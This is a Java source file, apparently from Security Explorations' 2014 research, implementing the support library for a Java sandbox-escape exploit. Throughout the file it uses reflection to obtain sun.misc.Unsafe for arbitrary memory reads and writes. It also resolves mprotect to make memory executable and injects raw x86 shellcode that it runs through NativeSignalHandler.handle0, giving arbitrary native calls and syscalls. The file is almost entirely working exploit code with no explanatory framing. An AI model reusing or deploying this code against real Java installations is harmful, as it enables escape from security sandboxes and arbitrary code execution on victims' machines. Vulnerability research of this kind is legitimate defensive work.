/*## (c) SECURITY EXPLORATIONS    2014 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.util.*;
import java.util.concurrent.atomic.*;
import java.io.*;
import java.security.*;
import java.net.*;

public class API {
 public static final int JVM_DIR_PAD = 60;
 public static PrintWriter out;

 public static int LINESIZE = 16;



 public static int RWX_CHUNK_SIZE = 0x1000;

 public static int PROT_READ   = 0x01;
 public static int PROT_WRITE  = 0x02;
 public static int PROT_EXEC   = 0x04;

 private static String  allowed_chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890!@#$%^&*()_+-={}[]|:\";',.<>?/"; 

 private static Long launcher;
 private static Method find;

 private static Object unsafe;
 private static Method getint;
 private static Method putint;
 private static Method alloc;
 private static Method free;

 private static Method handle;
 private static int argdata;
 private static int code;
 private static int syscall;

 private static int rwx_chunk;

 private static int handle_code[]={
  0x53ec8b55,
  0x57565251,
  0xfc28ec83,
  0x8b08758b,
  0x04c68306,
  0x08b9fc8b,
  0xf3000000,
  0x8bd0ffa5,
  0x06890875,
  0x5f28c483,
  0x5b595a5e,
  0x9090c35d
 };

 private static int syscall_code[]={
  0x53ec8b55,
  0x57565251,
  0x8b28ec83,
  0x5d8b0845,
  0x104d8b0c,
  0x8b14558b,
  0x7d8b1875,
  0x8380cd1c,
  0x5e5f28c4,
  0x5d5b595a,
  0x909090c3 
 };

 public static void setOut(PrintWriter pw) {
  out=pw;
 }

 private static String padded_string(String s,int space) {
  int cnt=s.length();

  String pad="";

  if (cnt<space) {
   pad=s;

   for(int i=0;i<(space-cnt);i++) {
    pad+=" ";
   }
  } else pad=s.substring(s.length()-space);

  return pad;
 }

 private static String dopad(int num) {

  String str="";

  
  for(int i=0;i<num;i++) {

   str+=" ";

  }

  
  return str;

 }



 public static String hex_value(int val,int max) {

  String s="";

  for(int i=0;i<max;i++) {

   s+="0";

  }


  s+=Integer.toHexString(val);


  return s.substring(s.length()-max);

 }



 private static String char_value(char c) {

  char tab[]=new char[1];


  if (allowed_chars.indexOf(c)!=-1) {

   tab[0]=c;

   return new String(tab);

  } else return ".";

 }

 

private static void print_line(int pad,byte tab[],int pos) throws Throwable {

  String str=dopad(pad)+hex_value(pos,4)+": ";


  int size=tab.length-pos;


  if (size>LINESIZE) size=LINESIZE;


  for(int i=pos;i<(pos+size);i++) {

   str+=" "+hex_value((int)tab[i],2);

  }


  str+="  ";


  for(int i=pos;i<(pos+size);i++) {

   str+=char_value((char)tab[i]);

  }

  

  out.println(str);
 }


 public static void print_buf(int pad,byte tab[]) throws Throwable {

  int pos=0;

  
while(pos<tab.length) {

   print_line(pad,tab,pos);

   pos+=LINESIZE;

  }

 } 

 public static int get_rwx_mem(int size) {
  int res=rwx_chunk;
  rwx_chunk+=size;

  return res;
 } 

 public static int get_rwx_mem() {
  int rwxmem=0;

  try {
   out.println("get_rwx_mem");

   if (unsafe==null) init_unsafe();

   Dummy dummy=new Dummy();

   int addr=TCHelper.getaddr(dummy);



   out.println("clazz addr "+Integer.toHexString(addr));



   addr=read_mem(addr+0x04); // Klass (0x14 name, 0x50 access_flags)

                             // instanceKlass fields from 0x6c offset

                             // (0x6c array_klasses, 0x98 source file name)



   int methods=read_mem(addr+0x70); // methods objArrayOop



   int midx=1; //idx 0 is <init>

   int maddr=read_mem(methods+0x0c+midx*0x04); //methodOop

                                               //(0x18 access flags)

                                               //(0x20 method size)
   
   int adapter=read_mem(maddr+0x40); //compiled code ptr (_adapter)

   rwxmem=read_mem(adapter+0x14);    //_c2i_unverified_entry
   rwxmem=(rwxmem+0x03)&0xfffffffc;

/*
   byte mem[]=read_mem(addr,0x100);

   print_buf(0,mem); 
*/
  } catch(Throwable t) {
  } 

  return rwxmem;
 }

 public static void mprotect_invoke() {
  try {
   int rwx_mem=get_rwx_mem();
   out.println("rwx_mem ptr "+Integer.toHexString(rwx_mem));



   int org_mem[]=new int[handle_code.length];

   for(int i=0;i<handle_code.length;i++) {
    int val=read_mem(rwx_mem+0x04*i);
    org_mem[i]=val;
   }

   rwx_chunk=malloc(RWX_CHUNK_SIZE);

   out.println("rwx_chunk "+Integer.toHexString(rwx_chunk));



   int mprotect=get_addr("mprotect");
   out.println("mprotect "+Integer.toHexString(mprotect));



   int mode=PROT_READ|PROT_WRITE|PROT_EXEC;
   out.println("mode "+Integer.toHexString(mode));



   write_mem(argdata+0x00,mprotect);
   write_mem(argdata+0x04,rwx_chunk&0xfffff000);
   write_mem(argdata+0x08,RWX_CHUNK_SIZE);
   write_mem(argdata+0x0c,mode);

   write_mem(argdata+0x10,0x00);
   write_mem(argdata+0x14,0x00);
   write_mem(argdata+0x18,0x00);
   write_mem(argdata+0x1c,0x00);
   write_mem(argdata+0x20,0x00);

   Object args[]=new Object[2];
   args[0]=new Integer(argdata);
   args[1]=new Long(rwx_mem);

   for(int i=0;i<handle_code.length;i++) {
    int val=handle_code[i];
    write_mem(rwx_mem+0x04*i,val);
   }

   handle.invoke(null,args);
   int res=read_mem(argdata);

   for(int i=0;i<handle_code.length;i++) {
    int val=org_mem[i];
    write_mem(rwx_mem+0x04*i,val);
   }

   out.println("mprotect res "+Integer.toHexString(res));



  } catch(Throwable t) {
  } 
 }
  
 public static void init_invoke() {
  try {
   Class c=Class.forName("sun.misc.NativeSignalHandler");
   out.println("c: "+c);

   Class ctab[]=new Class[2];
   ctab[0]=Integer.TYPE;
   ctab[1]=Long.TYPE;

   handle=c.getDeclaredMethod("handle0",ctab);
   handle.setAccessible(true);

   out.println("handle: "+handle);

   argdata=malloc(0x24);
   out.println("argdata: "+Integer.toHexString(argdata));

   mprotect_invoke();    

   code=rwx_chunk;
   rwx_chunk+=handle_code.length*0x04;

   for(int i=0;i<handle_code.length;i++) {
    int val=handle_code[i];
    write_mem(code+0x04*i,val);
   }

   out.println("code: "+Integer.toHexString(code));

   syscall=rwx_chunk;
   rwx_chunk+=syscall_code.length*0x04;

   for(int i=0;i<syscall_code.length;i++) {
    int val=syscall_code[i];
    write_mem(syscall+0x04*i,val);
   }

   out.println("syscall: "+Integer.toHexString(syscall));
  } catch(Throwable t) {
  } 
 }

 public static int read_byte(int addr) throws Throwable {

  int val=read_mem(addr&0xfffffffc);

  int off=addr&0x03;


  switch(off) {

   case 0:

    val=val&0xff;

    break;

   case 1:

    val=(val>>8)&0xff;

    break;

   case 2:

    val=(val>>16)&0xff;

    break;

   case 3:

    val=(val>>24)&0xff;

    break;

  }


  return val;

 } 

 private static byte[] read_mem(int addr,int size) throws Throwable {

  byte mem[]=new byte[size];


  for(int i=0;i<size;i++) {

   mem[i]=(byte)read_byte(addr+i);

  }


  return mem;

 }

 public static String read_string(int addr) throws Throwable {

  int size=0;
  int i=0;

  while(true) {
   int c=read_byte(addr+i);

   if (c==0) break;
   size++;
   i++;
  }

  byte mem[]=new byte[size];



  for(i=0;i<size;i++) {

   mem[i]=(byte)read_byte(addr+i);

  }



  return new String(mem)
;
 }

 private static void init_launcher() {
  try {
   Class c=Class.forName("java.lang.ClassLoader");

   Method m=c.getDeclaredMethod("getLauncherHandle0",new Class[0]);
   m.setAccessible(true);

   launcher=(Long)m.invoke(null,new Object[0]);

   Class ctab[]=new Class[2];
   ctab[0]=Long.TYPE;
   ctab[1]=Class.forName("java.lang.String");

   find=c.getDeclaredMethod("findWithHandle0",ctab);
   find.setAccessible(true);
  } catch(Throwable t) {
  } 
 }

 private static void init_unsafe() {
  try {
   Class c=Class.forName("sun.misc.Unsafe");
   out.println("c: "+c);

   Field f=c.getDeclaredField("theUnsafe");
   f.setAccessible(true);

   out.println("f: "+f);

   unsafe=f.get(null);
   out.println("unsafe: "+unsafe);

   Class ctab[]=new Class[1];
   ctab[0]=Long.TYPE;

   getint=c.getDeclaredMethod("getInt",ctab);
   getint.setAccessible(true);

   out.println("getint: "+getint);

   ctab=new Class[2];
   ctab[0]=Long.TYPE;
   ctab[1]=Integer.TYPE;

   putint=c.getDeclaredMethod("putInt",ctab);
   putint.setAccessible(true);

   out.println("putint: "+putint);

   ctab=new Class[1];
   ctab[0]=Long.TYPE;

   alloc=c.getDeclaredMethod("allocateMemory",ctab);
   alloc.setAccessible(true);

   out.println("alloc: "+alloc);

   free=c.getDeclaredMethod("freeMemory",ctab);
   free.setAccessible(true);

   out.println("free: "+free);
  } catch(Throwable t) {
  } 
 }

 private static Long get_addr_internal(String name) throws Throwable {
  if (launcher==null) init_launcher();

  Object args[]=new Object[2];
  args[0]=launcher;
  args[1]=name;

  Long addr=(Long)find.invoke(null,args);
  return addr;
 }

 public static int get_addr(final String name) throws Throwable {
  Long addr=null;
  
  addr=(Long)AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      return get_addr_internal(name);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });

  if (addr==null) return -1;
   else return addr.intValue();
 }

 private static Integer read_mem_internal(int addr) throws Throwable {
  if (unsafe==null) init_unsafe();

  Object args[]=new Object[1];
  args[0]=new Long(addr);

  Integer val=(Integer)getint.invoke(unsafe,args);
  return val;
 }

 public static int read_mem(final int addr) throws Throwable {
  Integer val=null;
  
  val=(Integer)AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      return read_mem_internal(addr);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });

  if (val==null) return -1;
   else return val.intValue();
 }

 private static void write_mem_internal(int addr,int val) throws Throwable {
  if (unsafe==null) init_unsafe();

  Object args[]=new Object[2];
  args[0]=new Long(addr);
  args[1]=new Integer(val);

  putint.invoke(unsafe,args);
 }

 public static void write_mem(final int addr,final int val) throws Throwable {
  AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      write_mem_internal(addr,val);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });
 }

 private static Long malloc_internal(int size) throws Throwable {
  if (unsafe==null) init_unsafe();

  Object args[]=new Object[1];
  args[0]=new Long(size);

  Long val=(Long)alloc.invoke(unsafe,args);
  return val;
 }

 public static int malloc(final int size) throws Throwable {
  Long val=null;
  
  val=(Long)AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      return malloc_internal(size);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });

  if (val==null) return -1;
   else return val.intValue();
 }

 private static void free_internal(int addr) throws Throwable {
  if (unsafe==null) init_unsafe();

  Object args[]=new Object[1];
  args[0]=new Long(addr);

  free.invoke(unsafe,args);
 }

 public static void free(final int addr) throws Throwable {
  AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      free_internal(addr);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });
 }

 private static int call_internal(int addr,int a0,int a1,int a2,int a3,int a4,int a5,int a6,int a7) throws Throwable {
  if (code==0) init_invoke();

  write_mem(argdata+0x00,addr);
  write_mem(argdata+0x04,a0);
  write_mem(argdata+0x08,a1);
  write_mem(argdata+0x0c,a2);
  write_mem(argdata+0x10,a3);
  write_mem(argdata+0x14,a4);
  write_mem(argdata+0x18,a5);
  write_mem(argdata+0x1c,a6);
  write_mem(argdata+0x20,a7);

  Object args[]=new Object[2];
  args[0]=new Integer(argdata);
  args[1]=new Long(code);

  handle.invoke(null,args);
  int res=read_mem(argdata);

  return res;
 }

 private static int syscall_internal(int num,int a0,int a1,int a2,int a3,int a4) throws Throwable {
  if (syscall==0) init_invoke();

  write_mem(argdata+0x00,syscall);
  write_mem(argdata+0x04,num);
  write_mem(argdata+0x08,a0);
  write_mem(argdata+0x0c,a1);
  write_mem(argdata+0x10,a2);
  write_mem(argdata+0x14,a3);
  write_mem(argdata+0x18,a4);
  write_mem(argdata+0x1c,0);
  write_mem(argdata+0x20,0);

  Object args[]=new Object[2];
  args[0]=new Integer(argdata);
  args[1]=new Long(code);

  handle.invoke(null,args);
  int res=read_mem(argdata);

  return res;
 }
 
 public static int call(final int addr,final int a0,final int a1,final int a2,final int a3,final int a4,final int a5,final int a6,final int a7) {
  Integer val=null;
  
  val=(Integer)AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      return call_internal(addr,a0,a1,a2,a3,a4,a5,a6,a7);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });

  if (val==null) return -1;
   else return val.intValue();
 }

 public static int syscall(final int num,final int a0,final int a1,final int a2,final int a3,final int a4) {
  Integer val=null;
  
  val=(Integer)AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      return syscall_internal(num,a0,a1,a2,a3,a4);
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });

  if (val==null) return -1;
   else return val.intValue();
 }

 public static void dump_mem(final int addr) throws Throwable {
  AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      byte mem[]=read_mem(addr,0x100);

      print_buf(0,mem); 
     } catch(Throwable t) {
      t.printStackTrace(out);
     }
     return null;
    }
  });
 }

 private static void print_tg(ThreadGroup tg,int lvl) {
  try {
   Class c=Class.forName("java.lang.ThreadGroup");

   Field fg=c.getDeclaredField("groups");
   fg.setAccessible(true);

   Field ft=c.getDeclaredField("threads");
   ft.setAccessible(true);

   Thread threads[]=(Thread[])ft.get(tg);
   ThreadGroup groups[]=(ThreadGroup[])fg.get(tg);

   String str=dopad(lvl*2);

   out.println(str+"GROUP "+tg);

   if (groups!=null) {
    for(int i=0;i<groups.length;i++) {
     if (groups[i]!=null) print_tg(groups[i],lvl+1);
    }
   }

   if (threads!=null) {
    for(int i=0;i<threads.length;i++) {
     if (threads[i]!=null) out.println(str+" - "+threads[i]);
    }
   }
  } catch(Throwable t) {}
 }

 private static ThreadGroup get_root_grup() {
  ThreadGroup group=Thread.currentThread().getThreadGroup();

  while(group.getParent()!=null) {
   group=group.getParent();
  }
  
  return group;
 }

 public static void jvm_print_threads() {
  print_tg(get_root_grup(),0);
 }  

 private static void jvm_dir_internal(String dirname,boolean recurse,boolean fullpath) throws Throwable {
  int i;

  File dir=new File(dirname);

  out.println("["+dir.getAbsolutePath()+"]");

  File entries[]=dir.listFiles();

  if (entries==null) entries=new File[0];

  for(i=0;i<entries.length;i++) {
   String content="";

   File entry=entries[i];
  
   if (fullpath) {
    content+=padded_string(entry.getPath(),JVM_DIR_PAD);
   } else {
    content+=padded_string(entry.getName(),JVM_DIR_PAD);
   }

   if (entry.isDirectory()) {
    content+="<DIR>";
   } else {
    content+=entry.length();
   }

   out.println(content);
  }

  if (recurse) {
   out.println("");

   for(i=0;i<entries.length;i++) {
    File entry=entries[i];
    if (entry.isDirectory()) {
     jvm_dir_internal(entry.getPath(),recurse,fullpath);
    }
   }
  }
 }

 public static void jvm_dir(final String dirname) throws Throwable {
  AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
     try {
      jvm_dir_internal(dirname,false,false);
     } catch(Throwable t) {}
     return null;
    }
  });

 }

}
